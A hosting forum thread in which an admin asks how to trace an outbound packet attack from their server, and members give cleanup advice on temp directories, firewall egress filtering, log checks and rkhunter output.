LinkBack URL
About LinkBacksHi,
Someone is doing outbound attack from our server and got complained from DC, but they haven't provide thei nfo. They provided the IP address which was hit from our server.
What file I need to check it ?
Anyone can help me?
thanks
shan
Outbound attack please help
Hi,
Someone is doing outbound attack from our server and got complained from DC, but they haven't provide thei nfo. They provided the IP address which was hit from our server.
What file I need to check it ?
Anyone can help me?
thanks
shan
Scan your /tmp and /var/tmp for strange files belonging to nobody and search the forums on outbound upd attack, taht will show a thread with more helpfull info.
You need to clean up your server from all the strange files downloaded and/or installed on your server. Kill all the processes used/exahusted by these tools and then you need to patch, upgrade, and secure your server. Good luck!Originally Posted by shann
Andy Reed
RHCE and CCNA
ServerTune.com
Also check /dev/shm
you can quickly install this firewall so that it will stop the attack until you discover the source.
http://www.rfxnetworks.com/apf.php
Thank you guys, but I have the targetted IP, is any way I can track it down?.
Can we check it at /var/log/messages?
thanks
I have instatlled APF and How do we stop the outbound attack?. I have teh targetted
Ip.
Please help me.
thanks
With APF, set up and enable egress filtering. It will not stop your server from sending the attack, but it will stop the packets from leaving your server.
Check server logs (httpd logs) for the word wget. This is often used as part of a URL exploit that tells a site on your server to download and install a perl script to launch packet attacks. This will give you an idea of how the attack was started, and which site you need to be checking.
Look for outdated programs on your server (read: phpBB).
Run rkhunter.
Secure your /tmp directory.
search the /tmp directory for any pl files. If you find them, delete them.
http://eth0.us is a good place to start.
Check all the current processes through ps -auxf | more. It can give you and glimse of the attack that is orinating from the server. Probally someone is scanning the other host for a vulnerability.
Stop Reymond !! A single conversation with a wise man is better than ten years of study. So....
Hi,
I have used rkhunter and got following message? Is anything need to be fixed?
Any help would be appreicated.
Security advisories
* Check: Groups and Accounts
Searching for /etc/passwd... [ Found ]
Checking users with UID '0' (root)... [ OK ]
* Check: SSH
Searching for sshd_config...
Found /etc/ssh/sshd_config
Checking for allowed root login... Watch out Root login possible. Possible risk!
info:
Hint: See logfile for more information about this issue
Checking for allowed protocols... [ Warning (SSH v1 allowed) ]
Also, got this
D5
MD5 compared: 0
Incorrect MD5 checksums: 0
File scan
Scanned files: 342
Possible infected files: 0
Application scan
Vulnerable applications: 3
Scanning took 466 seconds
How do we tack it down?
your server is most likely is not compromised some sort of udp or tcp floooder was uploaded into your tmp dir though a a insecure php script
run a ps auxf and look for somthing running that should not be
my god man if you cant find whats leaving your server hire someone to track it down for you
we cant see it from the forums
Lowest Host/Empire Technology LLC
Affordable hosting solutions http://empire-hosting.net
List Your hosting site FREE in http://hostgeneration.com
Reply With Quote